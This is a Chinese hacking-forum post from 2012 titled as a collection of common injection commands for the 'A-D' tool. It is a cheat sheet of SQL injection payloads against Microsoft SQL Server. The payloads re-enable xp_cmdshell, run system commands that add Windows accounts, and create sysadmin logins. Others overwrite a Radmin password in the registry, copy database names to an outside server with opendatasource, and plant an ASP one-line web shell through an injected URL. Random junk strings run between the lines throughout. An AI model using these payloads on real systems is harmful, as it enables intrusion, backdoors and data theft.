中国网络渗透测试联盟
标题:
阿D常用的一些注入命令
[打印本页]
作者:
admin
时间:
2012-9-13 17:26
标题:
阿D常用的一些注入命令
阿D常用的一些注入命令
9 [+ U# p4 C7 X4 L
//看看是什么权限的
2 c! u1 N0 |; J- @' T# j
and 1=(Select IS_MEMBER('db_owner'))
* e, H2 w( n* a% C% A& _
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
0 H7 U( O! K8 u$ q5 h
$ k/ X" |3 |1 T' F; K
//检测是否有读取某数据库的权限
% t8 V) N1 j) V, h
and 1= (Select HAS_DBACCESS('master'))
/ H9 l. `8 ~7 g! }2 }& ?! t" F
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
; w5 @) n: u+ ?6 a
D: X/ U# }& N1 t% q& x$ y
6 }! a9 D y1 G0 v& t
数字类型
( o0 l. I4 E* K4 j2 G/ _3 I
and char(124)%2Buser%2Bchar(124)=0
! G: G; c: o4 g
4 e8 W" u1 ]. ^$ x4 T: U
字符类型
R$ H( F4 Z6 X' _+ t P: M6 h# e
' and char(124)%2Buser%2Bchar(124)=0 and ''='
* Y% p* j; |6 _
* V& c9 y, J+ A" V* C+ s% ?
搜索类型
/ U, o6 C3 ?& Z# J4 l7 q2 e; i" H
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
, h+ ~% n p5 ?1 c" m" l
' K( g3 X$ a* Q) E( j
爆用户名
+ D/ J( |, N' h3 ^: F7 N0 K
and user>0
' ]; V. K3 q# q$ `
' and user>0 and ''='
$ H; q o+ S; k! h& m$ \) f
: n- q' l: q0 q! X* k5 n
检测是否为SA权限
" }: f3 W7 Y5 r3 }
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
d' b/ p# \1 i& g$ ]
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
& n, A4 @7 L9 d& d8 F% i/ H
: n3 Y4 }! A9 M. j& ^
检测是不是MSSQL数据库
. e& p2 a5 y+ {: z
and exists (select * from sysobjects);--
) X8 I4 {' ?8 z1 C) m W3 E
+ g; t' x9 B( [7 h5 b5 C$ h4 l
检测是否支持多行
% H0 l0 G9 }, j# c2 p
;declare @d int;--
- q& F6 r2 s0 c: v8 p- q
* b6 Y5 w! v6 U" n* a
恢复 xp_cmdshell
9 t' E+ I( Z# f7 s( M$ r# e
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
S! y% U* v( c& P; ]0 X2 [
6 p! p$ M3 }) P
; L0 b1 S5 t: {- E
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
% g7 t; M/ @! H; P$ C6 @
z& n' O6 A# ?( U- |2 T6 a. k
//-----------------------
4 @" `: x- M% C. f4 v1 a2 N, [
// 执行命令
# ^6 C) p# \0 B5 j
//-----------------------
/ n2 j! @3 c' P1 i
首先开启沙盘模式:
' F* U% R) U7 h; u. v
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
$ G2 b7 k7 f+ O. R
- n& |8 ~8 E$ F
然后利用jet.oledb执行系统命令
" O5 ]/ z! O, Z+ P# x
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
! t: m$ L! u* t9 r8 L/ a7 H1 N
/ q' \+ S" ]' K% R5 p
执行命令
& b- W6 D: ]; ~/ G) k
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
+ J6 C1 n5 M, J' ^% b
l o+ q* F$ y- I8 n! f- \
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
* e, ^$ Q! D, o8 R+ n
0 N7 z1 J9 c8 z
判断xp_cmdshell扩展存储过程是否存在:
* T: Q5 N; e$ e7 f3 \3 i& q
http://192.168.1.5/display.asp?keyno=188
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
0 y3 G: z6 N1 x; q5 O0 X
3 s1 V! }- O) |8 I
写注册表
% H1 K2 I& i; C
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
# p/ y! s8 J3 C2 c' M
- E8 {) U; {5 k4 K( y2 F2 p
REG_SZ
# l/ l- f/ m; o* q* r4 O
6 F8 u/ m3 n% x# W( q' O
读注册表
) _% v3 M: @2 I' q$ B
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
, {. _& \1 r( {3 B/ b% {. \, U
" b7 s( M% |5 m, W6 Z& u1 r$ z: |5 B6 |
读取目录内容
- `4 P6 m7 _, q, |: c' v
exec master..xp_dirtree 'c:\winnt\system32\',1,1
- t+ Y( t; T$ J* n; ]# g
, [/ D3 a; L5 y: p
1 B/ U, E( [& i! ~8 r ~
数据库备份
" Y9 r8 V3 j1 t: G
backup database pubs to disk = 'c:\123.bak'
5 E3 E% m* `. p" T6 R
+ K, u, k/ _2 v/ g3 E$ a& r% D
//爆出长度
5 C, A! d, K% O! y. o$ g
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
% h& z1 c4 m, L6 m8 w1 B R6 b
# x6 J( X" B2 ]3 {0 n8 g
! h, k) t; o8 r& i0 r5 b
9 R) [! n# Q7 H. E4 }
更改sa口令方法:用sql综合利用工具连接后,执行命令:
2 ?% A& D3 Z2 Y- N8 a3 Z
exec sp_password NULL,'新密码','sa'
' l' v1 m( U* L, F
% B Q- J: t7 q/ `% V
添加和删除一个SA权限的用户test:
) x ?: w& g2 ~- S0 \; Y: k, S
exec master.dbo.sp_addlogin test,ptlove
. D. U0 F1 p. F- v: H* J: p5 Q
exec master.dbo.sp_addsrvrolemember test,sysadmin
! a& l; E! O5 l5 ~ K8 `; p
7 p) o4 t0 z/ Z" ?- L( a
删除扩展存储过过程xp_cmdshell的语句:
8 B! Q# A: W( w2 D, |& y
exec sp_dropextendedproc 'xp_cmdshell'
/ L) K; ]# \4 ~
$ F5 h/ t! [ @, Y; x
添加扩展存储过过程
' e- s( H( q3 D; `6 ?) w
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
' e0 E0 O# K$ Y- K- a
GRANT exec On xp_proxiedadata TO public
& U9 g/ }, H T" \5 e6 q$ h) G5 g
. _2 s% w0 K: S" p( y- b+ R9 Y
1 Y5 E4 `( k: K/ x' V/ i0 b
停掉或激活某个服务。
; p0 m& u' r9 i! q# U9 @: m
! E1 F6 G U) K. z
exec master..xp_servicecontrol 'stop','schedule'
. H* f& K: L7 E4 _% I% p
exec master..xp_servicecontrol 'start','schedule'
* E% m+ M# h' y& h' E: |7 y; m/ {
8 V, s4 g. E8 _4 w. X. c+ t( Y
dbo.xp_subdirs
( A& H. L, ^4 t
/ x1 J7 [" p2 A/ ~! t
只列某个目录下的子目录。
( y' ^" |$ Z1 o6 Q& x' u7 z7 v
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
, ~6 `6 t4 T$ ]5 j @2 n: j
/ f+ V4 o- r9 x. v6 E% K, Q
dbo.xp_makecab
7 G! b& @, x5 Q( a2 Q! y' I
+ @% H2 i% @5 r2 b! K2 Z
将目标多个档案压缩到某个目标档案之内。
/ Y( q, f' O" e, t' L0 a
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
, q' U- E2 x8 d: M+ m1 P# e
' z% I' h/ R1 [# w
dbo.xp_makecab
7 A! [( a& x% d% x# O
'c:\test.cab','mszip',1,
* b+ k/ d8 J; l& R" Y
'C:\Inetpub\wwwroot\SQLInject\login.asp',
5 e' K; f3 X0 `7 `
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
; G" j. w5 h, F2 a! y: f( u
1 H, X& J, C9 g% E4 `
xp_terminate_process
, {0 t% r, m% W- `
5 X q1 g( z( _: V; D4 n( }
停掉某个执行中的程序,但赋予的参数是 Process ID。
1 V7 M# t& p4 Y' v+ `6 T
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
! d& K0 M4 q7 H2 s: v
4 B8 S% u- o1 t# Q8 ?+ c; a2 j
xp_terminate_process 2484
2 z6 G& g2 A% ?
G& K" I& P) g+ J# G
xp_unpackcab
% u7 q$ b0 j! V) P) I: X
) }6 p) }$ c* F7 a; W% }
解开压缩档。
4 v' |. S2 P. E4 Y( @9 ]
1 H& s8 M/ X/ G
xp_unpackcab 'c:\test.cab','c:\temp',1
1 D1 I6 y. L1 \9 m9 i
4 `. l; x: i$ r1 M) c' R5 s0 a3 V
; ^0 Z# r7 o! j9 z* }8 e2 b' v
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
- z$ [, ~: r: w; q" [! t/ E
: U4 N- o& a& M% e2 D: P& t2 M
create database lcx;
_+ g" r6 h |2 o
Create TABLE ku(name nvarchar(256) null);
; a& f7 _$ L$ k7 \9 b
Create TABLE biao(id int NULL,name nvarchar(256) null);
# W8 M; i3 A4 L
; ]1 U! \! g! J3 l1 n& q, O
//得到数据库名
1 U3 B4 \: G8 m4 @8 i) \' Q
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
" U n7 E* T! X4 t. f& h V
0 q0 ?. s# l& v* |3 {6 [. ~6 T
1 U) r! b+ o; P8 T& V
//在Master中创建表,看看权限怎样
' _) V4 @+ `8 R/ X. |1 l4 d0 j
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
5 p- [7 ~& }0 R" X- n
" ] [' Z0 O1 t! p; G' H+ |# L
用 sp_makewebtask直接在web目录里写入一句话马:
6 ~ O) P3 i0 p* D
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:
\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
0 u' j) k$ Y4 k+ P6 D
( z) R) t0 m$ g8 m7 I% I+ G! J
//更新表内容
8 f& ~/ p; O; \' [
Update films SET kind = 'Dramatic' Where id = 123
" {+ q, r8 [7 W G& o
- J9 p2 T9 S5 I+ A+ X+ P+ V
//删除内容
+ d4 p$ z' M- ?! u' B
delete from table_name where Stockid = 3
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2